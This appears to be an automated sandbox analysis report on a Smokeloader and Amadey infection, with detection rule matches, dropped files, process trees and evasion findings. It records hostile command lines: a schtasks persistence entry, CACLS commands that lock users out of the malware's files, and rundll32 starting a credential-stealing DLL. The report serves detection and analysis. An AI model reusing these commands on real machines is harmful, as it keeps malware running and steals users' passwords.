Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: String function: 00C17D30 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: String function: 00DE9420 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: String function: 00DE76C0 appears 130 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015D5
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401602
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401605
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401609
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401613
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401617
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015D4
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015E0
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015EA
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015EE
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey, 0_2_00402693
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_004015D5
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401602
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401605
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401609
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401613
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401617
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_004015D4
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_004015E0
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_004015EA
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_004015EE
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey, 11_2_00402693
PE file contains executable resources (Code or Archives)
Source: kmxId0uLRn.exe Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: thgcici.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 8F68.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
Source: kmxId0uLRn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\thgcici Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@51/18@28/6
Source: C:\Users\user\AppData\Local\Temp\9545.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: kmxId0uLRn.exe ReversingLabs: Detection: 69%
Source: kmxId0uLRn.exe Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\kmxId0uLRn.exe C:\Users\user\Desktop\kmxId0uLRn.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exe
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
Source: unknown Process created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8F68.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1568
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\ec3ccaac0e84032af3ffe6a4a2668066
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Mutant created: \Sessions\1\BaseNamedObjects\bf045808586a2473c5a7441da6f3bfa9
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\kmxId0uLRn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: kmxId0uLRn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Unpacked PE file: 0.2.kmxId0uLRn.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\thgcici Unpacked PE file: 11.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\thgcici Unpacked PE file: 43.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C120E0 push eax; ret 12_2_00C1228B
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C370DD push esi; ret 12_2_00C370E6
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C350F9 push esp; ret 12_2_00C350FA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C351FF push ebp; ret 12_2_00C3522A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3519C push ebp; ret 12_2_00C351A2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C351A8 push ebp; ret 12_2_00C351AA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C351AC push ebp; ret 12_2_00C351B2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C351B4 push ebp; ret 12_2_00C351BA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C351BC push ebp; ret 12_2_00C351C2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35147 push esp; ret 12_2_00C3514A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35101 push esp; ret 12_2_00C35102
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3511C push esp; ret 12_2_00C3512A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3512F push esp; ret 12_2_00C35132
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35134 push esp; ret 12_2_00C3513A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3513F push esp; ret 12_2_00C35142
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352C7 push ebp; ret 12_2_00C352CA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352CF push ebp; ret 12_2_00C352D2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352D4 push ebp; ret 12_2_00C352DA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352E1 push esi; ret 12_2_00C352E2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352F4 push esi; ret 12_2_00C352FA
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352FC push esi; ret 12_2_00C35302
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3529C push ebp; ret 12_2_00C352A2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352A4 push ebp; ret 12_2_00C352B2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C352B4 push ebp; ret 12_2_00C352C2
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35274 push ebp; ret 12_2_00C3529A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3522F push ebp; ret 12_2_00C3523A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35358 push edi; ret 12_2_00C35372
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35374 push edi; ret 12_2_00C3537A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C35304 push esi; ret 12_2_00C3530A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3530C push esi; ret 12_2_00C3531A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3531C push edi; ret 12_2_00C3537A

Persistence and Installation Behavior
barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\thgcici Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8F68.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe File created: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\thgcici Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9545.exe File created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9545.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\kmxid0ulrn.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\thgcici:Zone.Identifier read attributes | delete Jump to behavior
Uses cacls to modify the permissions of files
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9545.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
